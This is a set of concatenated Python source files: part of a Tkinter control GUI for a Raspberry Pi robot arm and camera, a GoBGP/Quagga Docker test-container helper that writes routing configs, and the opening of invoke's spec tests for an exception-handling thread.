shutil.copy2(file_path, Root_Dir + '/.Temp/' + group_Name[0] + '.txt' )
self.groupBox.insert('end', group_Name[0])
if self.groupBox.size() == 1:
self.groupBox.select_set(0)
self.groupBox.activate(0)
self.groupSelected = group_Name[0]
for line in file:
stripLine = line.strip()
self.commandBox.insert(line_index,stripLine)
line_index = line_index + 1
def exportGroup(self):
'''
This funciton exports the group in .txt format
'''
if self.groupBox.size():
with open(Root_Dir + '/Export Files/'+ self.groupSelected +'.txt', 'w') as file:
size = self.commandBox.size()
if size:
for index in range(0, size):
cmdValue = self.commandBox.get(index)
file.write(''.join(cmdValue)+'\n')
tk.messagebox.showinfo('Export',self.groupSelected+'.txt'+'- Exported')
else:
tk.messagebox.showerror('Export Error','Cannot export file empty file..!!')
else:
tk.messagebox.showerror('Export Error','Group Name Not Selected..!!')
    def rightFrame_Contents(self):
        '''
        Build the right-hand frame: the robot-body canvas with per-servo
        ID labels, enable checkbuttons, position/time entries, the group
        listbox and the command listbox (both with scrollbars).
        '''
        # Canvas line segments: (x0, y0, x1, y1, fill colour, width).
        LINE = [
            (130, 70, 180, 70, 'SteelBlue2', 30), (110, 20, 110, 100, 'gray30', 50),
            (180, 70, 260, 70, 'gray30', 50), (260, 70, 310, 70, 'SteelBlue2', 30),
            (310, 70, 390, 70, 'gray30', 50), (350, 150, 350, 95, 'SteelBlue2', 30),
            (280, 255, 370, 155, 'SteelBlue2', 30), (310, 170, 390, 170, 'gray30', 50),
            (250, 260, 330, 260, 'gray30', 50), (220, 285, 420, 285, 'SteelBlue2', 5),
            (240, 293, 400, 293, 'gray65', 10), (240, 300, 240, 350, 'gold', 8),
            (400, 300, 400, 350, 'gold', 8), (220, 300, 420, 300, 'SteelBlue2', 5),
            (280, 325, 360, 325, 'gray30', 47)]
        # Per-servo placement tables (one tuple per servo ID 1..6).
        ID_LABEL = [(95, 20), (190, 50), (320, 50), (320, 150), (260, 240), (290, 305)]
        C_BUTTON = [(95, 35), (230, 50), (360, 50),(360, 150), (300, 240), (330, 305)]
        # POS_VAL: (initial position value, x, y) for each position entry.
        POS_VAL = [(500, 90, 55), (500, 184, 72), (500, 314, 72), (500, 314, 172),
                   (500, 254, 262), (500, 284, 327)]
        TIME_VAL = [(95, 78), (227, 72), (357, 72), (357, 172), (297, 262), (327, 327)]
        self.bodyCanvas=tk.Canvas(self.right_frame,width=480,height=350,bg="white")
        self.bodyCanvas.grid(row=0, column=0)
        self.bodyCanvas.grid_propagate(0)
        self.bodyCanvas.create_polygon(90,20,30,20, 30,30, 90, 60, 90,100,30,100, 30,90, 90, 60, fill='gray30')
        # Tk validation callbacks; %-codes are substituted by Tk on each keypress.
        pos_vcmd = (self.register(self.pos_validate),'%s','%S','%P', '%V')
        time_vcmd = (self.register(self.time_validate),'%P')
        for index in range(15):
            self.bodyCanvas.create_line(LINE[index][0], LINE[index][1], LINE[index][2],
                                        LINE[index][3], fill=LINE[index][4],
                                        width=LINE[index][5])
        for index in range(6):
            var = tk.IntVar()
            label = tk.Label(self.bodyCanvas, text='ID-'+ str(index+1), bg='gray30',
                             fg='white')
            label.place(x=ID_LABEL[index][0], y=ID_LABEL[index][1])
            # index=index default binds the current loop value (late-binding fix).
            checkBut = tk.Checkbutton(self.bodyCanvas,bg='gray30',variable=var,
                                      command= lambda index=index: self.tick_EnTorque(index))
            checkBut.place(x=C_BUTTON[index][0],y=C_BUTTON[index][1])
            self.checkIDVar.append(var)
            entry = tk.Entry(self.bodyCanvas,validate='key', bg='SlateGray1',
                             validatecommand = pos_vcmd, width=4, bd='1')
            entry.place(x=POS_VAL[index][1], y=POS_VAL[index][2])
            entry.insert('end', POS_VAL[index][0])
            self.posEntry.append(entry)
            entry = tk.Entry(self.bodyCanvas, validate='key',
                             validatecommand = time_vcmd, width=3, bd='1')
            entry.place(x=TIME_VAL[index][0], y=TIME_VAL[index][1])
            entry.insert('end', 500)
            self.timeEntry.append(entry)
        # 'logo' is a module-level global image; a disabled Button is used
        # purely as an image holder.
        logoButton = tk.Button(self.bodyCanvas, image=logo, height = 40, width = 130,
                               bg='white', bd=0, highlightthickness=0, fg='white',
                               state='disabled')
        logoButton.place(x=10, y=300)
        self.camButton = tk.Button(self.bodyCanvas,text='Camera',command = self.camera,bg='gray80',highlightthickness=0)
        self.camButton.place(x=320, y=5)
        self.closeButton = tk.Button(self.bodyCanvas,text='Close',command=self.close_Robot,
                                     bg='gray80',highlightthickness=0)
        self.closeButton.place(x=410, y=5)
        # Group Name
        tk.Label(self.right_frame,text="GROUP NAME",fg='white',bg="gray50",padx=36).place(x=481,y=0)
        self.groupBox = tk.Listbox(self.right_frame, exportselection=0,height=22, width = 19)
        self.groupBox.place(x=480,y=18)
        self.groupBox.select_set(0)
        self.groupBox.activate(0)
        ygscrollbar = tk.Scrollbar(self.right_frame)
        ygscrollbar.place(x=620, y=21, relheight = 0.69)
        self.groupBox.config(yscrollcommand=ygscrollbar.set)
        ygscrollbar.config(command=self.groupBox.yview)
        self.groupBox.bind("<<ListboxSelect>>",self.groupBindData )
        # Command
        frame = tk.Frame(self.right_frame,height=15, width=632, bg="gray50")
        frame.place(x=0,y=350)
        tk.Label(self.right_frame,text="COMMAND",fg="white",bg="gray50",pady=0).place(x=270,y=350)
        self.commandBox = tk.Listbox(self.right_frame,exportselection=0,height=7,width=77)
        self.commandBox.place(x=0,y=364)
        xscrollbar = tk.Scrollbar(self.right_frame, orient = 'horizontal')
        xscrollbar.place(x=0, y=468, relwidth = 1)
        yscrollbar = tk.Scrollbar(self.right_frame)
        yscrollbar.place(x=620, y=367, relheight = 0.21)
        self.commandBox.config(xscrollcommand=xscrollbar.set)
        self.commandBox.config(yscrollcommand=yscrollbar.set)
        xscrollbar.config(command=self.commandBox.xview)
        yscrollbar.config(command=self.commandBox.yview)
        # Double-click on a command replays it on the robot.
        self.commandBox.bind("<Double-Button-1>", self.onclickPlay)
def delay_validate(self, new_value):
'''
This funciton validate delay entry value
'''
try:
if str(new_value) == '':
return True
elif int(new_value) >= 0 and int(new_value) <= 3000:
return True
else:
self.bell()
return False
except ValueError:
self.bell()
return False
def pos_validate(self, textBefore, textInserted, entryValue, focus):
'''
This funciton validate position entry values
'''
try:
if entryValue:
if int(entryValue) >= 0 and int(entryValue) <= 999:
return True
else:
self.bell()
return False
else:
return True
except ValueError:
self.bell()
return False
def time_validate(self, new_value):
'''
This funciton validates time entry values
'''
try:
if new_value:
if int(new_value) >= 0 and int(new_value) <= 999:
return True
else:
self.bell()
return False
else:
return True
except ValueError:
self.bell()
return False
def groupBindData(self,event):
'''
This funciton bind data of the group box
'''
curSelection = self.groupBox.curselection()
if curSelection:
selectedGroup = self.groupBox.get(curSelection)
if self.groupSelected != selectedGroup:
self.commandBox.delete(0, 'end')
self.groupSelected = selectedGroup
file = open(Root_Dir+'/.Temp/'+ self.groupSelected +'.txt', 'r')
for line in file:
stripLine = line.strip()
self.commandBox.insert(0,stripLine)
    def onclickPlay(self, event):
        '''
        Double-click handler for the command listbox: replay the selected
        command line on the robot by writing each servo position.
        '''
        index = self.commandBox.curselection()
        if index:
            rawData = self.commandBox.get(index)
            rawData = rawData.split(' ')
            # Last token holds the delay as 'Delay:<ms>'; converted to
            # seconds here but not used below -- TODO confirm intent.
            delay = rawData[-1].split(':')
            delay = int(delay[1])/1000
            if robot.alive:
                # Assumes the command line always has 17 servo tokens
                # before the delay token -- TODO confirm against the
                # command-recording format.
                for value in range(0, 17):
                    cmd_Data = re.findall('\d+', rawData[value])
                    robot.servoWrite(int(cmd_Data[0]), int(cmd_Data[1]), int(cmd_Data[2]))
                    self.checkIDVar[value].set(1)
            else:
                # NOTE(review): uses bare 'messagebox' while other methods
                # use 'tk.messagebox' -- presumably imported at file top.
                messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
    def camera(self):
        '''
        Swap the main GUI for the camera frame and build its controls:
        Photo/Video mode buttons, home, back and shutter buttons.
        '''
        self.container.pack_forget()
        self.camFrame.pack(fill = 'both', expand = True)
        # Not currently recording video.
        self.Fl_VideoRecord = False
        camButton = tk.Button(self.camFrame,text="Photo",font=("Helvetica",16),compound="top",
                              bd = 0,bg = "black", fg = "white",highlightbackground = "black",
                              activebackground = "black",activeforeground = "white",
                              image=self.camIcon,command = lambda: self.startPreview("Picture"),
                              highlightthickness=0)
        camButton.place(x=140, y=100)
        vidButton = tk.Button(self.camFrame,text="Video",font=("Helvetica",16),compound="top",
                              bd = 0,bg = "black", fg = "white",highlightbackground = "black",
                              activebackground = "black",activeforeground = "white",
                              image=self.vidIcon,command = lambda: self.startPreview("Video"),
                              highlightthickness=0)
        vidButton.place(x=450, y=100)
        self.camhome = tk.Button(self.camFrame,image=self.homeIcon, bg = "black", fg = "black", bd = 0,
                                 highlightbackground = "black",text='Home',
                                 activebackground = "black",command=self.forgetCam,
                                 activeforeground = "black")
        self.camhome.place(x=730,y=40)
        # Back and shutter start disabled; startPreview() enables them once
        # the camera preview is actually running.
        self.back = tk.Button(self.camFrame,text = "Home", bg = "black", fg = "black",
                              bd = 0, image = self.backIcon,
                              highlightbackground = "black",
                              activebackground = "black",
                              activeforeground = "black",state="disable",
                              command = self.camBack)
        self.back.place(x=730,y=280)
        self.click = tk.Button(self.camFrame, image=self.clickIcon,bg = "black", fg = "black",
                               bd = 0,font=("bold",12), command=self.camClick,
                               highlightbackground="black",
                               activebackground = "black",
                               activeforeground="black",compound="center",
                               state="disable")
        self.click.place(x=725,y=160)
    def startPreview(self, arg):
        '''
        Start the PiCamera preview in "Picture" or "Video" mode (arg),
        after checking via vcgencmd that a camera is enabled and detected.
        Shows a transient error label otherwise.
        '''
        self.cameraMode = arg
        label = tk.Label(self.camFrame, text="",font=("helvetica", 15), bg='black')
        label.place(x=250, y=350)
        response = subprocess.check_output(["sudo","vcgencmd","get_camera"])
        if(response == b'supported=1 detected=1\n'):
            # NOTE(review): this assignment shadows the camera() *method*
            # on this instance -- after the first preview, self.camera is a
            # PiCamera object, not the method.  Renaming the attribute would
            # require touching camClick()/camBack() too.
            self.camera = picamera.PiCamera()
            self.back.config(state="normal")
            self.click.config(state="normal")
            if arg == "Picture":
                self.click.config(text="Photo")
            else:
                self.click.config(text="Video")
            # Windowed preview sized to the right half of an 800x480 screen.
            self.camera.preview_fullscreen=False
            self.camera.preview_window=(400, 240, 730, 480)
            self.camera.resolution=(800,480)
            self.camera.start_preview()
            self.camhome.config(state="disable")
        elif(response == b'supported=0 detected=0\n'):
            label.config(text="Error: Camera is not enabled", bg="yellow")
            # Auto-hide the error after 4 seconds.
            label.after(4000, label.place_forget)
        else:
            label.config(text="Error: Camera is not connected properly",
                         bg="yellow")
            label.after(4000, label.place_forget)
    def camClick(self):
        '''
        Shutter button handler: capture a timestamped photo, or toggle
        video recording (first press starts, second press stops and tears
        the camera down).
        '''
        if(self.cameraMode == "Picture"):
            self.camera.capture(Root_Dir + '/Gallery/Photos/' + 'img_' +
                                time.strftime('%d%m%Y_')+time.strftime('%H%M%S')
                                + '.jpg')
        elif (self.cameraMode == "Video") and self.Fl_VideoRecord == False:
            # First press in Video mode: start recording.
            self.click.config(text="Record", fg="red")
            self.back.config(state="disable")
            self.Fl_VideoRecord = True
            self.camera.start_recording(Root_Dir + '/Gallery/Videos/' + 'vid_' +
                                        time.strftime('%d%m%Y_')+
                                        time.strftime('%H%M%S') + '.h264')
        elif self.Fl_VideoRecord == True:
            # Second press: stop recording and release the camera.
            self.Fl_VideoRecord = False
            self.cameraMode = None
            self.camera.stop_recording()
            self.camera.stop_preview()
            self.camera.close()
            self.click.config(text="",fg="black")
            self.back.config(state="disable")
            self.click.config(state="disable")
            self.camhome.config(state="normal")
    def camBack(self):
        '''
        Back button handler: stop the preview, release the camera and
        return the camera-frame controls to their idle state.
        '''
        self.camera.stop_preview()
        self.camera.close()
        self.click.config(text="",fg="black")
        self.back.config(state="disable")
        self.click.config(state="disable")
        self.camhome.config(state="normal")
    def forgetCam(self):
        '''
        Hide the camera frame and restore the main GUI container.
        '''
        self.camFrame.pack_forget()
        self.container.pack(fill = 'both', expand = True)
#######################################################################################################
# Module-level globals; robot/logo/img are (re)assigned during startup.
robot = None
logo = None
img = None
# Maximum raw servo value accepted by the arm.
MAX_VALUE = 1023
Root_Dir = os.path.dirname(os.path.realpath(__file__))
# Recreate the scratch directory used for per-group command files.
if os.path.exists(Root_Dir + '/.Temp'):
    shutil.rmtree(Root_Dir + '/.Temp')
os.mkdir(Root_Dir + '/.Temp')
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG)
if __name__ == "__main__":
    robot = piarm.PiArm()
    app = MainApp()
    # NOTE(review): 'img' is still None here unless MainApp() assigns the
    # global during construction -- TODO confirm.
    app.tk.call('wm', 'iconphoto', app._w, img)
    app.resizable(0,0)
    app.mainloop()
|
gobgp.py
|
# Copyright (C) 2015 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import json
from itertools import chain
from threading import Thread
import subprocess
import os
from fabric import colors
from fabric.api import local
from fabric.utils import indent
import netaddr
import toml
import yaml
from lib.base import (
BGPContainer,
CmdBuffer,
BGP_ATTR_TYPE_AS_PATH,
BGP_ATTR_TYPE_NEXT_HOP,
BGP_ATTR_TYPE_MULTI_EXIT_DISC,
BGP_ATTR_TYPE_LOCAL_PREF,
BGP_ATTR_TYPE_COMMUNITIES,
BGP_ATTR_TYPE_MP_REACH_NLRI,
community_str,
)
def extract_path_attribute(path, typ):
    """Return the first attribute dict in path['attrs'] whose 'type' is typ.

    Returns None when no attribute of that type is present.
    """
    return next((attr for attr in path['attrs'] if attr['type'] == typ), None)
class GoBGPContainer(BGPContainer):
SHARED_VOLUME = '/root/shared_volume'
QUAGGA_VOLUME = '/etc/quagga'
def __init__(self, name, asn, router_id, ctn_image_name='osrg/gobgp',
log_level='debug', zebra=False, config_format='toml',
zapi_version=2, ospfd_config=None):
super(GoBGPContainer, self).__init__(name, asn, router_id,
ctn_image_name)
self.shared_volumes.append((self.config_dir, self.SHARED_VOLUME))
self.quagga_config_dir = '{0}/quagga'.format(self.config_dir)
self.shared_volumes.append((self.quagga_config_dir, self.QUAGGA_VOLUME))
self.log_level = log_level
self.prefix_set = None
self.neighbor_set = None
self.bgp_set = None
self.statements = None
self.default_policy = None
self.zebra = zebra
self.zapi_version = zapi_version
self.config_format = config_format
# To start OSPFd in GoBGP container, specify 'ospfd_config' as a dict
# type value.
# Example:
# ospfd_config = {
# 'redistributes': [
# 'connected',
# ],
# 'networks': {
# '192.168.1.0/24': '0.0.0.0', # <network>: <area>
# },
# }
self.ospfd_config = ospfd_config or {}
def _start_gobgp(self, graceful_restart=False):
c = CmdBuffer()
c << '#!/bin/bash'
c << '/go/bin/gobgpd -f {0}/gobgpd.conf -l {1} -p {2} -t {3} > ' \
'{0}/gobgpd.log 2>&1'.format(self.SHARED_VOLUME, self.log_level, '-r' if graceful_restart else '', self.config_format)
cmd = 'echo "{0:s}" > {1}/start.sh'.format(c, self.config_dir)
local(cmd, capture=True)
cmd = "chmod 755 {0}/start.sh".format(self.config_dir)
local(cmd, capture=True)
self.local("{0}/start.sh".format(self.SHARED_VOLUME), detach=True)
def graceful_restart(self):
self.local("pkill -INT gobgpd")
def _start_zebra(self):
if self.zapi_version == 2:
daemon_bin = '/usr/lib/quagga/zebra'
else:
daemon_bin = 'zebra'
cmd = '{0} -f {1}/zebra.conf'.format(daemon_bin, self.QUAGGA_VOLUME)
self.local(cmd, detach=True)
def _start_ospfd(self):
if self.zapi_version == 2:
daemon_bin = '/usr/lib/quagga/ospfd'
else:
daemon_bin = 'ospfd'
cmd = '{0} -f {1}/ospfd.conf'.format(daemon_bin, self.QUAGGA_VOLUME)
self.local(cmd, detach=True)
def run(self):
super(GoBGPContainer, self).run()
if self.zebra:
self._start_zebra()
if self.ospfd_config:
self._start_ospfd()
self._start_gobgp()
return self.WAIT_FOR_BOOT
@staticmethod
def _get_as_path(path):
asps = (p['as_paths'] for p in path['attrs']
if p['type'] == BGP_ATTR_TYPE_AS_PATH and 'as_paths' in p and p['as_paths'] is not None)
asps = chain.from_iterable(asps)
asns = (asp['asns'] for asp in asps)
return list(chain.from_iterable(asns))
@staticmethod
def _get_nexthop(path):
for p in path['attrs']:
if p['type'] == BGP_ATTR_TYPE_NEXT_HOP or p['type'] == BGP_ATTR_TYPE_MP_REACH_NLRI:
return p['nexthop']
@staticmethod
def _get_local_pref(path):
for p in path['attrs']:
if p['type'] == BGP_ATTR_TYPE_LOCAL_PREF:
return p['value']
return None
@staticmethod
def _get_med(path):
for p in path['attrs']:
if p['type'] == BGP_ATTR_TYPE_MULTI_EXIT_DISC:
return p['metric']
return None
@staticmethod
def _get_community(path):
for p in path['attrs']:
if p['type'] == BGP_ATTR_TYPE_COMMUNITIES:
return [community_str(c) for c in p['communities']]
return None
def _get_rib(self, dests_dict):
dests = []
for k, v in dests_dict.items():
for p in v:
p["nexthop"] = self._get_nexthop(p)
p["aspath"] = self._get_as_path(p)
p["local-pref"] = self._get_local_pref(p)
p["community"] = self._get_community(p)
p["med"] = self._get_med(p)
p["prefix"] = k
path_id = p.get("id", None)
if path_id:
p["identifier"] = p["id"]
dests.append({'paths': v, 'prefix': k})
return dests
def _trigger_peer_cmd(self, cmd, peer):
peer_addr = self.peer_name(peer)
cmd = 'gobgp neighbor {0} {1}'.format(peer_addr, cmd)
self.local(cmd)
def disable_peer(self, peer):
self._trigger_peer_cmd('disable', peer)
def enable_peer(self, peer):
self._trigger_peer_cmd('enable', peer)
def reset(self, peer):
self._trigger_peer_cmd('reset', peer)
def softreset(self, peer, rf='ipv4', type='in'):
self._trigger_peer_cmd('softreset{0} -a {1}'.format(type, rf), peer)
def get_local_rib(self, peer, prefix='', rf='ipv4'):
peer_addr = self.peer_name(peer)
cmd = 'gobgp -j neighbor {0} local {1} -a {2}'.format(peer_addr, prefix, rf)
output = self.local(cmd, capture=True)
return self._get_rib(json.loads(output))
def get_global_rib(self, prefix='', rf='ipv4'):
cmd = 'gobgp -j global rib {0} -a {1}'.format(prefix, rf)
output = self.local(cmd, capture=True)
return self._get_rib(json.loads(output))
def monitor_global_rib(self, queue, rf='ipv4'):
host = self.ip_addrs[0][1].split('/')[0]
if not os.path.exists('{0}/gobgp'.format(self.config_dir)):
self.local('cp /go/bin/gobgp {0}/'.format(self.SHARED_VOLUME))
args = '{0}/gobgp -u {1} -j monitor global rib -a {2}'.format(self.config_dir, host, rf).split(' ')
def monitor():
process = subprocess.Popen(args, stdout=subprocess.PIPE)
for line in iter(process.stdout.readline, ''):
p = json.loads(line)[0]
p["nexthop"] = self._get_nexthop(p)
p["aspath"] = self._get_as_path(p)
p["local-pref"] = self._get_local_pref(p)
p["med"] = self._get_med(p)
queue.put(p)
t = Thread(target=monitor)
t.daemon = True
t.start()
def _get_adj_rib(self, adj_type, peer, prefix='', rf='ipv4'):
peer_addr = self.peer_name(peer)
cmd = 'gobgp neighbor {0} adj-{1} {2} -a {3} -j'.format(peer_addr,
adj_type,
prefix, rf)
output = self.local(cmd, capture=True)
ret = [p[0] for p in json.loads(output).itervalues()]
for p in ret:
p["nexthop"] = self._get_nexthop(p)
p["aspath"] = self._get_as_path(p)
p["prefix"] = p['nlri']['prefix']
p["local-pref"] = self._get_local_pref(p)
p["med"] = self._get_med(p)
return ret
def get_adj_rib_in(self, peer, prefix='', rf='ipv4'):
return self._get_adj_rib('in', peer, prefix, rf)
def get_adj_rib_out(self, peer, prefix='', rf='ipv4'):
return self._get_adj_rib('out', peer, prefix, rf)
def get_neighbor(self, peer):
cmd = 'gobgp -j neighbor {0}'.format(self.peer_name(peer))
return json.loads(self.local(cmd, capture=True))
def get_neighbor_state(self, peer):
return self.get_neighbor(peer)['state']['session-state']
def clear_policy(self):
self.policies = {}
for info in self.peers.itervalues():
info['policies'] = {}
self.prefix_set = []
self.neighbor_set = []
self.statements = []
def set_prefix_set(self, ps):
if not isinstance(ps, list):
ps = [ps]
self.prefix_set = ps
def add_prefix_set(self, ps):
if self.prefix_set is None:
self.prefix_set = []
self.prefix_set.append(ps)
def set_neighbor_set(self, ns):
if not isinstance(ns, list):
ns = [ns]
self.neighbor_set = ns
def add_neighbor_set(self, ns):
if self.neighbor_set is None:
self.neighbor_set = []
self.neighbor_set.append(ns)
def set_bgp_defined_set(self, bs):
self.bgp_set = bs
def create_config(self):
self._create_config_bgp()
if self.zebra:
local('mkdir -p {0}'.format(self.quagga_config_dir))
local('chmod 777 {0}'.format(self.quagga_config_dir))
self._create_config_zebra()
if self.ospfd_config:
self._create_config_ospfd()
def _create_config_bgp(self):
config = {
'global': {
'config': {
'as': self.asn,
'router-id': self.router_id,
},
'route-selection-options': {
'config': {
'external-compare-router-id': True,
},
},
},
'neighbors': [],
}
if self.zebra and self.zapi_version == 2:
config['global']['use-multiple-paths'] = {'config': {'enabled': True}}
for peer, info in self.peers.iteritems():
afi_safi_list = []
if info['interface'] != '':
afi_safi_list.append({'config':{'afi-safi-name': 'ipv4-unicast'}})
afi_safi_list.append({'config':{'afi-safi-name': 'ipv6-unicast'}})
else:
version = netaddr.IPNetwork(info['neigh_addr']).version
if version == 4:
afi_safi_list.append({'config':{'afi-safi-name': 'ipv4-unicast'}})
elif version == 6:
afi_safi_list.append({'config':{'afi-safi-name': 'ipv6-unicast'}})
else:
Exception('invalid ip address version. {0}'.format(version))
if info['vpn']:
afi_safi_list.append({'config': {'afi-safi-name': 'l3vpn-ipv4-unicast'}})
afi_safi_list.append({'config': {'afi-safi-name': 'l3vpn-ipv6-unicast'}})
afi_safi_list.append({'config': {'afi-safi-name': 'l2vpn-evpn'}})
afi_safi_list.append({'config': {'afi-safi-name': 'rtc'}, 'route-target-membership': {'config': {'deferral-time': 10}}})
if info['flowspec']:
afi_safi_list.append({'config': {'afi-safi-name': 'ipv4-flowspec'}})
afi_safi_list.append({'config': {'afi-safi-name': 'l3vpn-ipv4-flowspec'}})
afi_safi_list.append({'config': {'afi-safi-name': 'ipv6-flowspec'}})
afi_safi_list.append({'config': {'afi-safi-name': 'l3vpn-ipv6-flowspec'}})
neigh_addr = None
interface = None
if info['interface'] == '':
neigh_addr = info['neigh_addr'].split('/')[0]
else:
interface = info['interface']
n = {
'config': {
'neighbor-address': neigh_addr,
'neighbor-interface': interface,
'peer-as': peer.asn,
'auth-password': info['passwd'],
'vrf': info['vrf'],
'remove-private-as': info['remove_private_as'],
},
'afi-safis': afi_safi_list,
'timers': {
'config': {
'connect-retry': 10,
},
},
'transport': {
'config': {},
},
}
n['as-path-options'] = {'config': {}}
if info['allow_as_in'] > 0:
n['as-path-options']['config']['allow-own-as'] = info['allow_as_in']
if info['replace_peer_as']:
n['as-path-options']['config']['replace-peer-as'] = info['replace_peer_as']
if ':' in info['local_addr']:
n['transport']['config']['local-address'] = info['local_addr'].split('/')[0]
if info['passive']:
n['transport']['config']['passive-mode'] = True
if info['is_rs_client']:
n['route-server'] = {'config': {'route-server-client': True}}
if info['local_as']:
n['config']['local-as'] = info['local_as']
if info['prefix_limit']:
for v in afi_safi_list:
v['prefix-limit'] = {'config': {'max-prefixes': info['prefix_limit'], 'shutdown-threshold-pct': 80}}
if info['graceful_restart'] is not None:
n['graceful-restart'] = {'config': {'enabled': True, 'restart-time': 20}}
for afi_safi in afi_safi_list:
afi_safi['mp-graceful-restart'] = {'config': {'enabled': True}}
if info['llgr'] is not None:
n['graceful-restart']['config']['restart-time'] = 1
n['graceful-restart']['config']['long-lived-enabled'] = True
for afi_safi in afi_safi_list:
afi_safi['long-lived-graceful-restart'] = {'config': {'enabled': True, 'restart-time': 30}}
if info['is_rr_client']:
cluster_id = self.router_id
if 'cluster_id' in info and info['cluster_id'] is not None:
cluster_id = info['cluster_id']
n['route-reflector'] = {'config': {'route-reflector-client': True,
'route-reflector-cluster-id': cluster_id}}
if info['addpath']:
n['add-paths'] = {'config' : {'receive': True,
'send-max': 16}}
if len(info.get('default-policy', [])) + len(info.get('policies', [])) > 0:
n['apply-policy'] = {'config': {}}
for typ, p in info.get('policies', {}).iteritems():
n['apply-policy']['config']['{0}-policy-list'.format(typ)] = [p['name']]
def _f(v):
if v == 'reject':
return 'reject-route'
elif v == 'accept':
return 'accept-route'
raise Exception('invalid default policy type {0}'.format(v))
for typ, d in info.get('default-policy', {}).iteritems():
n['apply-policy']['config']['default-{0}-policy'.format(typ)] = _f(d)
if info['treat_as_withdraw']:
n['error-handling'] = {'config': {'treat-as-withdraw': True}}
config['neighbors'].append(n)
config['defined-sets'] = {}
if self.prefix_set:
config['defined-sets']['prefix-sets'] = self.prefix_set
if self.neighbor_set:
config['defined-sets']['neighbor-sets'] = self.neighbor_set
if self.bgp_set:
config['defined-sets']['bgp-defined-sets'] = self.bgp_set
policy_list = []
for p in self.policies.itervalues():
policy = {'name': p['name']}
if 'statements' in p:
policy['statements'] = p['statements']
policy_list.append(policy)
if len(policy_list) > 0:
config['policy-definitions'] = policy_list
if self.zebra:
config['zebra'] = {'config': {'enabled': True,
'redistribute-route-type-list': ['connect'],
'version': self.zapi_version}}
with open('{0}/gobgpd.conf'.format(self.config_dir), 'w') as f:
print colors.yellow('[{0}\'s new gobgpd.conf]'.format(self.name))
if self.config_format is 'toml':
raw = toml.dumps(config)
elif self.config_format is 'yaml':
raw = yaml.dump(config)
elif self.config_format is 'json':
raw = json.dumps(config)
else:
raise Exception('invalid config_format {0}'.format(self.config_format))
print colors.yellow(indent(raw))
f.write(raw)
def _create_config_zebra(self):
c = CmdBuffer()
c << 'hostname zebra'
c << 'password zebra'
c << 'log file {0}/zebra.log'.format(self.QUAGGA_VOLUME)
c << 'debug zebra packet'
c << 'debug zebra kernel'
c << 'debug zebra rib'
c << ''
with open('{0}/zebra.conf'.format(self.quagga_config_dir), 'w') as f:
print colors.yellow('[{0}\'s new zebra.conf]'.format(self.name))
print colors.yellow(indent(str(c)))
f.writelines(str(c))
def _create_config_ospfd(self):
c = CmdBuffer()
c << 'hostname ospfd'
c << 'password zebra'
c << 'router ospf'
for redistribute in self.ospfd_config.get('redistributes', []):
c << ' redistribute {0}'.format(redistribute)
for network, area in self.ospfd_config.get('networks', {}).items():
c << ' network {0} area {1}'.format(network, area)
c << 'log file {0}/ospfd.log'.format(self.QUAGGA_VOLUME)
c << ''
with open('{0}/ospfd.conf'.format(self.quagga_config_dir), 'w') as f:
print colors.yellow('[{0}\'s new ospfd.conf]'.format(self.name))
print colors.yellow(indent(str(c)))
f.writelines(str(c))
def reload_config(self):
daemon = ['gobgpd']
if self.zebra:
daemon.append('zebra')
if self.ospfd_config:
daemon.append('ospfd')
for d in daemon:
cmd = '/usr/bin/pkill {0} -SIGHUP'.format(d)
self.local(cmd)
for v in chain.from_iterable(self.routes.itervalues()):
if v['rf'] == 'ipv4' or v['rf'] == 'ipv6':
r = CmdBuffer(' ')
r << 'gobgp global -a {0}'.format(v['rf'])
r << 'rib add {0}'.format(v['prefix'])
if v['identifier']:
r << 'identifier {0}'.format(v['identifier'])
if v['next-hop']:
r << 'nexthop {0}'.format(v['next-hop'])
if v['local-pref']:
r << 'local-pref {0}'.format(v['local-pref'])
if v['med']:
r << 'med {0}'.format(v['med'])
if v['community']:
r << 'community {0}'.format(
','.join(v['community'])
if isinstance(v['community'], (list, tuple)) else v['community'])
cmd = str(r)
elif v['rf'] == 'ipv4-flowspec' or v['rf'] == 'ipv6-flowspec':
cmd = 'gobgp global '\
'rib add match {0} then {1} -a {2}'.format(' '.join(v['matchs']), ' '.join(v['thens']), v['rf'])
else:
raise Exception('unsupported route faily: {0}'.format(v['rf']))
self.local(cmd)
def del_route(self, route, identifier=None, reload_config=True):
if route not in self.routes:
return
new_paths = []
for path in self.routes[route]:
if path['identifier'] != identifier:
new_paths.append(path)
else:
r = CmdBuffer(' ')
r << 'gobgp global -a {0}'.format(path['rf'])
r << 'rib del {0}'.format(path['prefix'])
if identifier:
r << 'identifier {0}'.format(identifier)
cmd = str(r)
self.local(cmd)
self.routes[route] = new_paths
# no need to reload config
class RawGoBGPContainer(GoBGPContainer):
def __init__(self, name, config, ctn_image_name='osrg/gobgp',
log_level='debug', zebra=False, config_format='yaml'):
if config_format is 'toml':
d = toml.loads(config)
elif config_format is 'yaml':
d = yaml.load(config)
elif config_format is 'json':
d = json.loads(config)
else:
raise Exception('invalid config format {0}'.format(config_format))
asn = d['global']['config']['as']
router_id = d['global']['config']['router-id']
self.config = config
super(RawGoBGPContainer, self).__init__(name, asn, router_id,
ctn_image_name, log_level,
zebra, config_format)
def create_config(self):
with open('{0}/gobgpd.conf'.format(self.config_dir), 'w') as f:
print colors.yellow('[{0}\'s new gobgpd.conf]'.format(self.name))
print colors.yellow(indent(self.config))
f.write(self.config)
|
concurrency.py
|
from invoke.vendor.six.moves.queue import Queue
from invoke.exceptions import ExceptionWrapper
from invoke.util import ExceptionHandlingThread as EHThread
from spec import Spec, ok_, eq_
# TODO: rename
# TODO: rename
class ExceptionHandlingThread_(Spec):
    """Spec-style tests for invoke.util.ExceptionHandlingThread.

    Nested classes are test groups discovered by the 'spec' runner; each
    method is a test case and setup() runs before each one.
    """
    class via_target:
        """Thread created with target=callable."""
        def setup(self):
            # Worker puts a sentinel value on the queue it is given.
            def worker(q):
                q.put(7)
            self.worker = worker
        def base_case(self):
            """Happy path: worker runs and its result lands on the queue."""
            queue = Queue()
